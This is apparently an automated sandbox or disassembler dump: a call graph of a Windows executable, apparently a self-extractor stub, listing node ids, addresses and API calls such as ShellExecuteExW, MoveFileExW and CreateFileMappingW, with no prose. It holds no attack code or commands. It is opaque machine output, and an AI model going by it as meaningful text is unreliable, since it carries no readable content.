_swprintf 51 API calls 24607->24613 24614 88c0a0 24608->24614 24610->24566 24611->24569 24616 88bb81 CreateFileMappingW 24612->24616 24617 88bd23 24613->24617 24614->24571 24618 88c0a9 DialogBoxParamW 24614->24618 24615 88bd70 24619 87e617 53 API calls 24615->24619 24621 88bbe3 GetCommandLineW 24616->24621 24656 88bc60 __InternalCxxFrameHandler 24616->24656 24629 87e617 53 API calls 24617->24629 24618->24504 24618->24571 24622 88bd7a SetDlgItemTextW 24619->24622 24624 88bbf4 24621->24624 24690 8712f1 GetDlgItem ShowWindow 24622->24690 24623 88baed 24627 88baff 24623->24627 24628 88baf4 GetLastError 24623->24628 24780 88b425 SHGetMalloc 24624->24780 24626 88bc6b ShellExecuteExW 24642 88bc88 24626->24642 24632 87959a 80 API calls 24627->24632 24628->24627 24633 88bd3d 24629->24633 24631 88bd8c SetDlgItemTextW GetDlgItem 24635 88bda9 GetWindowLongW SetWindowLongW 24631->24635 24636 88bdc1 24631->24636 24632->24637 24634 88bc10 24781 88b425 SHGetMalloc 24634->24781 24635->24636 24691 88c73f 24636->24691 24637->24582 24637->24583 24640 88bc1c 24782 88b425 SHGetMalloc 24640->24782 24645 88bc9d WaitForInputIdle 24642->24645 24646 88bccb 24642->24646 24644 88c73f 97 API calls 24648 88bddd 24644->24648 24649 88bcb2 24645->24649 24646->24592 24650 88bce1 UnmapViewOfFile CloseHandle 24646->24650 24647 88bc28 24783 87f3fa 82 API calls 2 library calls 24647->24783 24716 88da52 24648->24716 24649->24646 24653 88bcb7 Sleep 24649->24653 24650->24592 24653->24646 24653->24649 24654 88bc3f MapViewOfFile 24654->24656 24656->24626 24657 88c73f 97 API calls 24660 88be03 24657->24660 24658 88be2c 24784 8712d3 GetDlgItem EnableWindow 24658->24784 24660->24658 24662 88c73f 97 API calls 24660->24662 24661->24504 24661->24528 24662->24658 24664 87131f 24663->24664 24665 871378 24663->24665 24667 871385 24664->24667 24789 87e2e8 62 API calls 2 library calls 24664->24789 24790 87e2c1 GetWindowLongW SetWindowLongW 24665->24790 24667->24497 24667->24498 24667->24574 24669 871341 24669->24667 24670 871354 GetDlgItem 24669->24670 24670->24667 24671 871364 24670->24671 24671->24667 24672 87136a SetWindowTextW 24671->24672 24672->24667 24675 87a0bb 24673->24675 24674 87a14c 24677 87a175 24674->24677 24791 87a2b2 24674->24791 24675->24674 24675->24677 24678 87a2b2 8 API calls 24675->24678 24677->24558 24677->24559 24678->24675 24679->24570 24681 879678 24680->24681 24682 8796d5 CreateFileW 24681->24682 24683 8796c9 24681->24683 24682->24683 24684 87971f 24683->24684 24685 87bb03 GetCurrentDirectoryW 24683->24685 24684->24623 24686 879704 24685->24686 24686->24684 24687 879708 CreateFileW 24686->24687 24687->24684 24688->24602 24689->24615 24690->24631 24692 88c749 __EH_prolog 24691->24692 24693 88bdcf 24692->24693 24694 88b314 ExpandEnvironmentStringsW 24692->24694 24693->24644 24705 88c780 _wcslen _wcsrchr 24694->24705 24696 88b314 ExpandEnvironmentStringsW 24696->24705 24697 88ca67 SetWindowTextW 24697->24705 24700 893e3e 22 API calls 24700->24705 24702 88c855 SetFileAttributesW 24704 88c90f GetFileAttributesW 24702->24704 24715 88c86f _abort _wcslen 24702->24715 24704->24705 24707 88c921 DeleteFileW 24704->24707 24705->24693 24705->24696 24705->24697 24705->24700 24705->24702 24708 88cc31 GetDlgItem SetWindowTextW SendMessageW 24705->24708 24711 88cc71 SendMessageW 24705->24711 24812 881fbb CompareStringW 24705->24812 24813 88a64d GetCurrentDirectoryW 24705->24813 24815 87a5d1 6 API calls 24705->24815 24816 87a55a FindClose 24705->24816 24817 88b48e 76 API calls 2 library calls 24705->24817 24707->24705 24709 88c932 24707->24709 24708->24705 24710 874092 _swprintf 51 API calls 24709->24710 24712 88c952 GetFileAttributesW 24710->24712 24711->24705 24712->24709 24713 88c967 MoveFileW 24712->24713 24713->24705 24714 88c97f MoveFileExW 24713->24714 24714->24705 24715->24704 24715->24705 24814 87b991 51 API calls 2 library calls 24715->24814 24717 88da5c __EH_prolog 24716->24717 24818 880659 24717->24818 24719 88da8d 24822 875b3d 24719->24822 24721 88daab 24826 877b0d 24721->24826 24725 88dafe 24842 877b9e 24725->24842 24727 88bdee 24727->24657 24729 88d6a8 24728->24729 24730 88a5c6 4 API calls 24729->24730 24731 88d6ad 24730->24731 24732 88d6b5 GetWindow 24731->24732 24733 88bf15 24731->24733 24732->24733 24736 88d6d5 24732->24736 24733->24506 24733->24507 24734 88d6e2 GetClassNameW 25322 881fbb CompareStringW 24734->25322 24736->24733 24736->24734 24737 88d76a GetWindow 24736->24737 24738 88d706 GetWindowLongW 24736->24738 24737->24733 24737->24736 24738->24737 24739 88d716 SendMessageW 24738->24739 24739->24737 24740 88d72c GetObjectW 24739->24740 25323 88a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24740->25323 24742 88d743 25324 88a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24742->25324 25325 88a80c 8 API calls 24742->25325 24745 88d754 SendMessageW DeleteObject 24745->24737 24746->24521 24748 88abcc 24747->24748 24749 88abf1 24747->24749 25326 881fbb CompareStringW 24748->25326 24751 88abff 24749->24751 24752 88abf6 SHAutoComplete 24749->24752 24755 88b093 24751->24755 24752->24751 24753 88abdf 24753->24749 24754 88abe3 FindWindowExW 24753->24754 24754->24749 24756 88b09d __EH_prolog 24755->24756 24757 8713dc 84 API calls 24756->24757 24758 88b0bf 24757->24758 25327 871fdc 24758->25327 24761 88b0d9 24764 871692 86 API calls 24761->24764 24762 88b0eb 24763 8719af 129 API calls 24762->24763 24767 88b10d __InternalCxxFrameHandler ___std_exception_copy 24763->24767 24765 88b0e4 24764->24765 24765->24545 24765->24548 24766 871692 86 API calls 24766->24765 24767->24766 24768->24594 24770 88b568 5 API calls 24769->24770 24771 88d4e0 GetDlgItem 24770->24771 24772 88d502 24771->24772 24773 88d536 SendMessageW SendMessageW 24771->24773 24776 88d50d ShowWindow SendMessageW SendMessageW 24772->24776 24774 88d591 SendMessageW SendMessageW SendMessageW 24773->24774 24775 88d572 24773->24775 24777 88d5c4 SendMessageW 24774->24777 24778 88d5e7 SendMessageW 24774->24778 24775->24774 24776->24773 24777->24778 24778->24550 24779->24606 24780->24634 24781->24640 24782->24647 24783->24654 24784->24661 24785->24584 24786->24605 24787->24579 24788->24567 24789->24669 24790->24667 24792 87a2bf 24791->24792 24793 87a2e3 24792->24793 24795 87a2d6 CreateDirectoryW 24792->24795 24794 87a231 3 API calls 24793->24794 24797 87a2e9 24794->24797 24795->24793 24796 87a316 24795->24796 24799 87a325 24796->24799 24804 87a4ed 24796->24804 24798 87a329 GetLastError 24797->24798 24800 87bb03 GetCurrentDirectoryW 24797->24800 24798->24799 24799->24677 24802 87a2ff 24800->24802 24802->24798 24803 87a303 CreateDirectoryW 24802->24803 24803->24796 24803->24798 24805 88ec50 24804->24805 24806 87a4fa SetFileAttributesW 24805->24806 24807 87a510 24806->24807 24808 87a53d 24806->24808 24809 87bb03 GetCurrentDirectoryW 24807->24809 24808->24799 24810 87a524 24809->24810 24810->24808 24811 87a528 SetFileAttributesW 24810->24811 24811->24808 24812->24705 24813->24705 24814->24715 24815->24705 24816->24705 24817->24705 24819 880666 _wcslen 24818->24819 24846 8717e9 24819->24846 24821 88067e 24821->24719 24823 880659 _wcslen 24822->24823 24824 8717e9 78 API calls 24823->24824 24825 88067e 24824->24825 24825->24721 24827 877b17 __EH_prolog 24826->24827 24863 87ce40 24827->24863 24829 877b32 24830 88eb38 8 API calls 24829->24830 24831 877b5c 24830->24831 24869 884a76 24831->24869 24834 877c7d 24835 877c87 24834->24835 24837 877cf1 24835->24837 24898 87a56d 24835->24898 24839 877d50 24837->24839 24876 878284 24837->24876 24838 877d92 24838->24725 24839->24838 24904 87138b 74 API calls 24839->24904 24843 877bac 24842->24843 24845 877bb3 24842->24845 24844 882297 86 API calls 24843->24844 24844->24845 24847 8717ff 24846->24847 24858 87185a __InternalCxxFrameHandler 24846->24858 24848 871828 24847->24848 24859 876c36 76 API calls __vswprintf_c_l 24847->24859 24849 871887 24848->24849 24852 871847 ___std_exception_copy 24848->24852 24851 893e3e 22 API calls 24849->24851 24854 87188e 24851->24854 24852->24858 24861 876ca7 75 API calls 24852->24861 24853 87181e 24860 876ca7 75 API calls 24853->24860 24854->24858 24862 876ca7 75 API calls 24854->24862 24858->24821 24859->24853 24860->24848 24861->24858 24862->24858 24864 87ce4a __EH_prolog 24863->24864 24865 88eb38 8 API calls 24864->24865 24866 87ce8d 24865->24866 24867 88eb38 8 API calls 24866->24867 24868 87ceb1 24867->24868 24868->24829 24870 884a80 __EH_prolog 24869->24870 24871 88eb38 8 API calls 24870->24871 24872 884a9c 24871->24872 24873 877b8b 24872->24873 24875 880e46 80 API calls 24872->24875 24873->24834 24875->24873 24877 87828e __EH_prolog 24876->24877 24905 8713dc 24877->24905 24879 8782aa 24880 8782bb 24879->24880 25044 879f42 24879->25044 24884 8782f2 24880->24884 24913 871a04 24880->24913 24883 8782ee 24883->24884 24895 87a56d 7 API calls 24883->24895 24897 878389 24883->24897 25048 87c0c5 CompareStringW _wcslen 24883->25048 25049 871692 24884->25049 24890 8783e8 24940 871f6d 24890->24940 24893 8783f3 24893->24884 24944 873b2d 24893->24944 24956 87848e 24893->24956 24895->24883 24932 878430 24897->24932 24899 87a582 24898->24899 24900 87a5b0 24899->24900 25311 87a69b 24899->25311 24900->24835 24902 87a592 24902->24900 24903 87a597 FindClose 24902->24903 24903->24900 24904->24838 24906 8713e1 __EH_prolog 24905->24906 24907 87ce40 8 API calls 24906->24907 24908 871419 24907->24908 24909 88eb38 8 API calls 24908->24909 24912 871474 _abort 24908->24912 24910 871461 24909->24910 24911 87b505 84 API calls 24910->24911 24910->24912 24911->24912 24912->24879 24914 871a0e __EH_prolog 24913->24914 24926 871a61 24914->24926 24929 871b9b 24914->24929 25053 8713ba 24914->25053 24917 871bc7 25056 87138b 74 API calls 24917->25056 24919 873b2d 102 API calls 24923 871c12 24919->24923 24920 871bd4 24920->24919 24920->24929 24921 871c5a 24925 871c8d 24921->24925 24921->24929 25057 87138b 74 API calls 24921->25057 24923->24921 24924 873b2d 102 API calls 24923->24924 24924->24923 24925->24929 24930 879e80 79 API calls 24925->24930 24926->24917 24926->24920 24926->24929 24927 873b2d 102 API calls 24928 871cde 24927->24928 24928->24927 24928->24929 24929->24883 24930->24928 24931 879e80 79 API calls 24931->24926 25075 87cf3d 24932->25075 24934 878440 25079 8813d2 GetSystemTime SystemTimeToFileTime 24934->25079 24936 8783a3 24936->24890 24937 881b66 24936->24937 25084 88de6b 24937->25084 24941 871f72 __EH_prolog 24940->24941 24943 871fa6 24941->24943 25092 8719af 24941->25092 24943->24893 24945 873b39 24944->24945 24946 873b3d 24944->24946 24945->24893 24955 879e80 79 API calls 24946->24955 24947 873b4f 24948 873b6a 24947->24948 24949 873b78 24947->24949 24950 873baa 24948->24950 25245 8732f7 90 API calls 2 library calls 24948->25245 25246 87286b 102 API calls 3 library calls 24949->25246 24950->24893 24953 873b76 24953->24950 25247 8720d7 74 API calls 24953->25247 24955->24947 24957 878498 __EH_prolog 24956->24957 24960 8784d5 24957->24960 24972 878513 24957->24972 25272 888c8d 104 API calls 24957->25272 24959 8784f5 24961 87851c 24959->24961 24962 8784fa 24959->24962 24960->24959 24965 87857a 24960->24965 24960->24972 24961->24972 25274 888c8d 104 API calls 24961->25274 24962->24972 25273 877a0d 153 API calls 24962->25273 24965->24972 25248 875d1a 24965->25248 24967 878605 24967->24972 25254 878167 24967->25254 24970 878797 24971 87a56d 7 API calls 24970->24971 24973 878802 24970->24973 24971->24973 24972->24893 25260 877c0d 24973->25260 24975 87d051 82 API calls 24981 87885d 24975->24981 24976 87898b 25277 872021 74 API calls 24976->25277 24977 878a5f 24982 878ab6 24977->24982 24996 878a6a 24977->24996 24978 878992 24978->24977 24984 8789e1 24978->24984 24981->24972 24981->24975 24981->24976 24981->24978 25275 878117 85 API calls 24981->25275 25276 872021 74 API calls 24981->25276 24988 878a4c 24982->24988 25280 877fc0 97 API calls 24982->25280 24983 878ab4 24989 87959a 80 API calls 24983->24989 24986 878b14 24984->24986 24984->24988 24990 87a231 3 API calls 24984->24990 24985 879105 24987 87959a 80 API calls 24985->24987 24986->24985 25004 878b82 24986->25004 25281 8798bc 24986->25281 24987->24972 24988->24983 24988->24986 24989->24972 24992 878a19 24990->24992 24992->24988 25278 8792a3 97 API calls 24992->25278 24994 87ab1a 8 API calls 24997 878bd1 24994->24997 24996->24983 25279 877db2 101 API calls 24996->25279 24999 87ab1a 8 API calls 24997->24999 25018 878be7 24999->25018 25002 878b70 25285 876e98 77 API calls 25002->25285 25004->24994 25005 878cbc 25006 878e40 25005->25006 25007 878d18 25005->25007 25009 878e66 25006->25009 25010 878e52 25006->25010 25030 878d49 25006->25030 25008 878d8a 25007->25008 25011 878d28 25007->25011 25015 878167 19 API calls 25008->25015 25013 883377 75 API calls 25009->25013 25012 879215 124 API calls 25010->25012 25014 878d6e 25011->25014 25019 878d37 25011->25019 25012->25030 25016 878e7f 25013->25016 25014->25030 25288 8777b8 111 API calls 25014->25288 25020 878dbd 25015->25020 25022 883020 124 API calls 25016->25022 25017 878c93 25017->25005 25286 879a3c 82 API calls 25017->25286 25018->25005 25018->25017 25025 87981a 79 API calls 25018->25025 25287 872021 74 API calls 25019->25287 25026 878de6 25020->25026 25027 878df5 25020->25027 25020->25030 25022->25030 25025->25017 25289 877542 85 API calls 25026->25289 25290 879155 93 API calls __EH_prolog 25027->25290 25035 878f85 25030->25035 25291 872021 74 API calls 25030->25291 25032 879090 25032->24985 25034 87a4ed 3 API calls 25032->25034 25033 87903e 25267 879da2 25033->25267 25037 8790eb 25034->25037 25035->24985 25035->25032 25035->25033 25266 879f09 SetEndOfFile 25035->25266 25037->24985 25292 872021 74 API calls 25037->25292 25039 879085 25040 879620 77 API calls 25039->25040 25040->25032 25042 8790fb 25293 876dcb 76 API calls 25042->25293 25045 879f59 25044->25045 25046 879f63 25045->25046 25309 876d0c 78 API calls 25045->25309 25046->24880 25048->24883 25050 8716a4 25049->25050 25310 87cee1 86 API calls 25050->25310 25058 871732 25053->25058 25055 8713d6 25055->24931 25056->24929 25057->24925 25059 871748 25058->25059 25070 8717a0 __InternalCxxFrameHandler 25058->25070 25060 871771 25059->25060 25071 876c36 76 API calls __vswprintf_c_l 25059->25071 25062 8717c7 25060->25062 25067 87178d ___std_exception_copy 25060->25067 25064 893e3e 22 API calls 25062->25064 25063 871767 25072 876ca7 75 API calls 25063->25072 25066 8717ce 25064->25066 25066->25070 25074 876ca7 75 API calls 25066->25074 25067->25070 25073 876ca7 75 API calls 25067->25073 25070->25055 25071->25063 25072->25060 25073->25070 25074->25070 25076 87cf4d 25075->25076 25078 87cf54 25075->25078 25080 87981a 25076->25080 25078->24934 25079->24936 25081 879833 25080->25081 25083 879e80 79 API calls 25081->25083 25082 879865 25082->25078 25083->25082 25085 88de78 25084->25085 25086 87e617 53 API calls 25085->25086 25087 88de9b 25086->25087 25088 874092 _swprintf 51 API calls 25087->25088 25089 88dead 25088->25089 25090 88d4d4 16 API calls 25089->25090 25091 881b7c 25090->25091 25091->24890 25093 8719bf 25092->25093 25095 8719bb 25092->25095 25096 8718f6 25093->25096 25095->24943 25097 871908 25096->25097 25098 871945 25096->25098 25099 873b2d 102 API calls 25097->25099 25104 873fa3 25098->25104 25102 871928 25099->25102 25102->25095 25108 873fac 25104->25108 25105 873b2d 102 API calls 25105->25108 25106 871966 25106->25102 25109 871e50 25106->25109 25108->25105 25108->25106 25121 880e08 25108->25121 25110 871e5a __EH_prolog 25109->25110 25129 873bba 25110->25129 25112 871e84 25113 871732 78 API calls 25112->25113 25115 871f0b 25112->25115 25114 871e9b 25113->25114 25157 8718a9 78 API calls 25114->25157 25115->25102 25117 871eb3 25119 871ebf _wcslen 25117->25119 25158 881b84 MultiByteToWideChar 25117->25158 25159 8718a9 78 API calls 25119->25159 25122 880e0f 25121->25122 25125 880e2a 25122->25125 25127 876c31 RaiseException _com_raise_error 25122->25127 25124 880e3b SetThreadExecutionState 25124->25108 25125->25124 25128 876c31 RaiseException _com_raise_error 25125->25128 25127->25125 25128->25124 25130 873bc4 __EH_prolog 25129->25130 25131 873bf6 25130->25131 25132 873bda 25130->25132 25134 873e51 25131->25134 25137 873c22 25131->25137 25185 87138b 74 API calls 25132->25185 25210 87138b 74 API calls 25134->25210 25136 873be5 25136->25112 25137->25136 25160 883377 25137->25160 25139 873ca3 25140 873d2e 25139->25140 25156 873c9a 25139->25156 25188 87d051 25139->25188 25170 87ab1a 25140->25170 25141 873c9f 25141->25139 25187 8720bd 78 API calls 25141->25187 25143 873c71 25143->25139 25143->25141 25144 873c8f 25143->25144 25186 87138b 74 API calls 25144->25186 25146 873d41 25150 873dd7 25146->25150 25151 873dc7 25146->25151 25194 883020 25150->25194 25174 879215 25151->25174 25154 873dd5 25154->25156 25203 872021 74 API calls 25154->25203 25204 882297 25156->25204 25157->25117 25158->25119 25159->25115 25161 88338c 25160->25161 25163 883396 ___std_exception_copy 25160->25163 25211 876ca7 75 API calls 25161->25211 25164 88341c 25163->25164 25165 8834c6 25163->25165 25169 883440 _abort 25163->25169 25212 8832aa 75 API calls 3 library calls 25164->25212 25213 89238d RaiseException 25165->25213 25168 8834f2 25169->25143 25171 87ab28 25170->25171 25173 87ab32 25170->25173 25172 88eb38 8 API calls 25171->25172 25172->25173 25173->25146 25175 87921f __EH_prolog 25174->25175 25214 877c64 25175->25214 25178 8713ba 78 API calls 25179 879231 25178->25179 25217 87d114 25179->25217 25181 87928a 25181->25154 25183 87d114 119 API calls 25184 879243 25183->25184 25184->25181 25184->25183 25226 87d300 97 API calls __InternalCxxFrameHandler 25184->25226 25185->25136 25186->25156 25187->25139 25189 87d084 25188->25189 25190 87d072 25188->25190 25228 87603a 82 API calls 25189->25228 25227 87603a 82 API calls 25190->25227 25193 87d07c 25193->25140 25195 883029 25194->25195 25196 883052 25194->25196 25198 883048 25195->25198 25199 88303e 25195->25199 25201 883046 25195->25201 25196->25201 25243 88552f 124 API calls 2 library calls 25196->25243 25242 88624a 119 API calls 25198->25242 25229 886cdc 25199->25229 25201->25154 25203->25156 25205 8822a1 25204->25205 25206 8822ba 25205->25206 25209 8822ce 25205->25209 25244 880eed 86 API calls 25206->25244 25208 8822c1 25208->25209 25210->25136 25211->25163 25212->25169 25213->25168 25215 87b146 GetVersionExW 25214->25215 25216 877c69 25215->25216 25216->25178 25223 87d12a __InternalCxxFrameHandler 25217->25223 25218 87d29a 25219 87d2ce 25218->25219 25220 87d0cb 6 API calls 25218->25220 25221 880e08 SetThreadExecutionState RaiseException 25219->25221 25220->25219 25224 87d291 25221->25224 25222 888c8d 104 API calls 25222->25223 25223->25218 25223->25222 25223->25224 25225 87ac05 91 API calls 25223->25225 25224->25184 25225->25223 25226->25184 25227->25193 25228->25193 25230 88359e 75 API calls 25229->25230 25231 886ced __InternalCxxFrameHandler 25230->25231 25232 87d114 119 API calls 25231->25232 25233 8870fe 25231->25233 25236 8811cf 81 API calls 25231->25236 25237 883e0b 119 API calls 25231->25237 25238 887153 119 API calls 25231->25238 25239 880f86 88 API calls 25231->25239 25240 8877ef 124 API calls 25231->25240 25241 88390d 98 API calls 25231->25241 25232->25231 25234 885202 98 API calls 25233->25234 25235 88710e __InternalCxxFrameHandler 25234->25235 25235->25201 25236->25231 25237->25231 25238->25231 25239->25231 25240->25231 25241->25231 25242->25201 25243->25201 25244->25208 25245->24953 25246->24953 25247->24950 25249 875d2a 25248->25249 25294 875c4b 25249->25294 25252 875d5d 25253 875d95 25252->25253 25299 87b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25252->25299 25253->24967 25255 878186 25254->25255 25256 878232 25255->25256 25306 87be5e 19 API calls __InternalCxxFrameHandler 25255->25306 25305 881fac CharUpperW 25256->25305 25259 87823b 25259->24970 25261 877c22 25260->25261 25262 877c5a 25261->25262 25307 876e7a 74 API calls 25261->25307 25262->24981 25264 877c52 25308 87138b 74 API calls 25264->25308 25266->25033 25268 879db3 25267->25268 25270 879dc2 25267->25270 25269 879db9 FlushFileBuffers 25268->25269 25268->25270 25269->25270 25271 879e3f SetFileTime 25270->25271 25271->25039 25272->24960 25273->24972 25274->24972 25275->24981 25276->24981 25277->24978 25278->24988 25279->24983 25280->24988 25282 8798c5 GetFileType 25281->25282 25283 878b5a 25281->25283 25282->25283 25283->25004 25284 872021 74 API calls 25283->25284 25284->25002 25285->25004 25286->25005 25287->25030 25288->25030 25289->25030 25290->25030 25291->25035 25292->25042 25293->24985 25300 875b48 25294->25300 25297 875c6c 25297->25252 25298 875b48 2 API calls 25298->25297 25299->25252 25301 875b52 25300->25301 25303 875c3a 25301->25303 25304 87b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25301->25304 25303->25297 25303->25298 25304->25301 25305->25259 25306->25256 25307->25264 25308->25262 25309->25046 25312 87a6a8 25311->25312 25313 87a727 FindNextFileW 25312->25313 25314 87a6c1 FindFirstFileW 25312->25314 25315 87a732 GetLastError 25313->25315 25321 87a709 25313->25321 25316 87a6d0 25314->25316 25314->25321 25315->25321 25317 87bb03 GetCurrentDirectoryW 25316->25317 25318 87a6e0 25317->25318 25319 87a6e4 FindFirstFileW 25318->25319 25320 87a6fe GetLastError 25318->25320 25319->25320 25319->25321 25320->25321 25321->24902 25322->24736 25323->24742 25324->24742 25325->24745 25326->24753 25328 879f42 78 API calls 25327->25328 25329 871fe8 25328->25329 25330 871a04 102 API calls 25329->25330 25333 872005 25329->25333 25331 871ff5 25330->25331 25331->25333 25334 87138b 74 API calls 25331->25334 25333->24761 25333->24762 25334->25333 25399 8894e0 GetClientRect 25432 8821e0 26 API calls std::bad_exception::bad_exception 25454 88f2e0 46 API calls __RTC_Initialize 25455 89bee0 GetCommandLineA GetCommandLineW 25336 88eae7 25337 88eaf1 25336->25337 25338 88e85d ___delayLoadHelper2@8 14 API calls 25337->25338 25339 88eafe 25338->25339 25400 88f4e7 29 API calls _abort 25433 87f1e8 FreeLibrary 25402 892cfb 38 API calls 4 library calls 25434 8795f0 80 API calls 25456 875ef0 82 API calls 25348 8998f0 25356 89adaf 25348->25356 25351 899904 25353 89990c 25354 899919 25353->25354 25364 899920 11 API calls 25353->25364 25357 89ac98 __dosmaperr 5 API calls 25356->25357 25358 89add6 25357->25358 25359 89adee TlsAlloc 25358->25359 25360 89addf 25358->25360 25359->25360 25361 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25360->25361 25362 8998fa 25361->25362 25362->25351 25363 899869 20 API calls 2 library calls 25362->25363 25363->25353 25364->25351 25365 89abf0 25367 89abfb 25365->25367 25366 89af0a 11 API calls 25366->25367 25367->25366 25368 89ac24 25367->25368 25369 89ac20 25367->25369 25371 89ac50 DeleteCriticalSection 25368->25371 25371->25369 25403 8988f0 7 API calls ___scrt_uninitialize_crt 25436 88fd4f 9 API calls 2 library calls 25404 88a400 GdipDisposeImage GdipFree 25457 88d600 70 API calls 25405 896000 QueryPerformanceFrequency QueryPerformanceCounter 25439 892900 6 API calls 4 library calls 25458 89f200 51 API calls 25476 89a700 21 API calls 25478 871710 86 API calls 25441 88ad10 73 API calls 25409 871025 29 API calls 25411 89f421 21 API calls __vswprintf_c_l 25459 88c220 93 API calls _swprintf 25443 89b4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25444 88f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25481 88ff30 LocalFree 23504 89bb30 23505 89bb39 23504->23505 23506 89bb42 23504->23506 23508 89ba27 23505->23508 23528 8997e5 GetLastError 23508->23528 23510 89ba34 23548 89bb4e 23510->23548 23512 89ba3c 23557 89b7bb 23512->23557 23515 89ba53 23515->23506 23518 89ba96 23582 898dcc 23518->23582 23522 89ba91 23581 8991a8 20 API calls __dosmaperr 23522->23581 23524 89bada 23524->23518 23588 89b691 26 API calls 23524->23588 23525 89baae 23525->23524 23526 898dcc _free 20 API calls 23525->23526 23526->23524 23529 8997fb 23528->23529 23530 899801 23528->23530 23589 89ae5b 11 API calls 2 library calls 23529->23589 23534 899850 SetLastError 23530->23534 23590 89b136 23530->23590 23534->23510 23535 89981b 23537 898dcc _free 20 API calls 23535->23537 23539 899821 23537->23539 23538 899830 23538->23535 23540 899837 23538->23540 23541 89985c SetLastError 23539->23541 23598 899649 20 API calls __dosmaperr 23540->23598 23599 898d24 38 API calls _abort 23541->23599 23543 899842 23546 898dcc _free 20 API calls 23543->23546 23547 899849 23546->23547 23547->23534 23547->23541 23549 89bb5a __FrameHandler3::FrameUnwindToState 23548->23549 23550 8997e5 _unexpected 38 API calls 23549->23550 23554 89bb64 23550->23554 23552 89bbe8 _abort 23552->23512 23554->23552 23556 898dcc _free 20 API calls 23554->23556 23602 898d24 38 API calls _abort 23554->23602 23603 89ac31 EnterCriticalSection 23554->23603 23604 89bbdf LeaveCriticalSection _abort 23554->23604 23556->23554 23605 894636 23557->23605 23560 89b7dc GetOEMCP 23562 89b805 23560->23562 23561 89b7ee 23561->23562 23563 89b7f3 GetACP 23561->23563 23562->23515 23564 898e06 23562->23564 23563->23562 23565 898e44 23564->23565 23569 898e14 __dosmaperr 23564->23569 23616 8991a8 20 API calls __dosmaperr 23565->23616 23567 898e2f RtlAllocateHeap 23568 898e42 23567->23568 23567->23569 23568->23518 23571 89bbf0 23568->23571 23569->23565 23569->23567 23615 897a5e 7 API calls 2 library calls 23569->23615 23572 89b7bb 40 API calls 23571->23572 23574 89bc0f 23572->23574 23573 89bc16 23627 88fbbc 23573->23627 23574->23573 23575 89bc85 _abort 23574->23575 23578 89bc60 IsValidCodePage 23574->23578 23617 89b893 GetCPInfo 23575->23617 23577 89ba89 23577->23522 23577->23525 23578->23573 23579 89bc72 GetCPInfo 23578->23579 23579->23573 23579->23575 23581->23518 23583 898dd7 RtlFreeHeap 23582->23583 23587 898e00 __dosmaperr 23582->23587 23584 898dec 23583->23584 23583->23587 23708 8991a8 20 API calls __dosmaperr 23584->23708 23586 898df2 GetLastError 23586->23587 23587->23515 23588->23518 23589->23530 23596 89b143 __dosmaperr 23590->23596 23591 89b183 23601 8991a8 20 API calls __dosmaperr 23591->23601 23592 89b16e RtlAllocateHeap 23594 899813 23592->23594 23592->23596 23594->23535 23597 89aeb1 11 API calls 2 library calls 23594->23597 23596->23591 23596->23592 23600 897a5e 7 API calls 2 library calls 23596->23600 23597->23538 23598->23543 23600->23596 23601->23594 23603->23554 23604->23554 23606 894649 23605->23606 23607 894653 23605->23607 23606->23560 23606->23561 23607->23606 23608 8997e5 _unexpected 38 API calls 23607->23608 23609 894674 23608->23609 23613 89993a 38 API calls __cftof 23609->23613 23611 89468d 23614 899967 38 API calls __cftof 23611->23614 23613->23611 23614->23606 23615->23569 23616->23568 23618 89b977 23617->23618 23624 89b8cd 23617->23624 23621 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23618->23621 23623 89ba23 23621->23623 23623->23573 23634 89c988 23624->23634 23626 89ab78 __vswprintf_c_l 43 API calls 23626->23618 23628 88fbc4 23627->23628 23629 88fbc5 IsProcessorFeaturePresent 23627->23629 23628->23577 23631 88fc07 23629->23631 23707 88fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23631->23707 23633 88fcea 23633->23577 23635 894636 __cftof 38 API calls 23634->23635 23636 89c9a8 MultiByteToWideChar 23635->23636 23638 89ca7e 23636->23638 23639 89c9e6 23636->23639 23640 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23638->23640 23641 898e06 __vswprintf_c_l 21 API calls 23639->23641 23644 89ca07 _abort __vsnwprintf_l 23639->23644 23642 89b92e 23640->23642 23641->23644 23648 89ab78 23642->23648 23643 89ca78 23653 89abc3 20 API calls _free 23643->23653 23644->23643 23646 89ca4c MultiByteToWideChar 23644->23646 23646->23643 23647 89ca68 GetStringTypeW 23646->23647 23647->23643 23649 894636 __cftof 38 API calls 23648->23649 23650 89ab8b 23649->23650 23654 89a95b 23650->23654 23653->23638 23655 89a976 __vswprintf_c_l 23654->23655 23656 89a99c MultiByteToWideChar 23655->23656 23657 89a9c6 23656->23657 23668 89ab50 23656->23668 23661 898e06 __vswprintf_c_l 21 API calls 23657->23661 23666 89a9e7 __vsnwprintf_l 23657->23666 23658 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23659 89ab63 23658->23659 23659->23626 23660 89aa30 MultiByteToWideChar 23662 89aa49 23660->23662 23663 89aa9c 23660->23663 23661->23666 23681 89af6c 23662->23681 23690 89abc3 20 API calls _free 23663->23690 23666->23660 23666->23663 23668->23658 23669 89aaab 23671 898e06 __vswprintf_c_l 21 API calls 23669->23671 23675 89aacc __vsnwprintf_l 23669->23675 23670 89aa73 23670->23663 23672 89af6c __vswprintf_c_l 11 API calls 23670->23672 23671->23675 23672->23663 23673 89ab41 23689 89abc3 20 API calls _free 23673->23689 23675->23673 23676 89af6c __vswprintf_c_l 11 API calls 23675->23676 23677 89ab20 23676->23677 23677->23673 23678 89ab2f WideCharToMultiByte 23677->23678 23678->23673 23679 89ab6f 23678->23679 23691 89abc3 20 API calls _free 23679->23691 23692 89ac98 23681->23692 23685 89afdc LCMapStringW 23686 89af9c 23685->23686 23687 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23686->23687 23688 89aa60 23687->23688 23688->23663 23688->23669 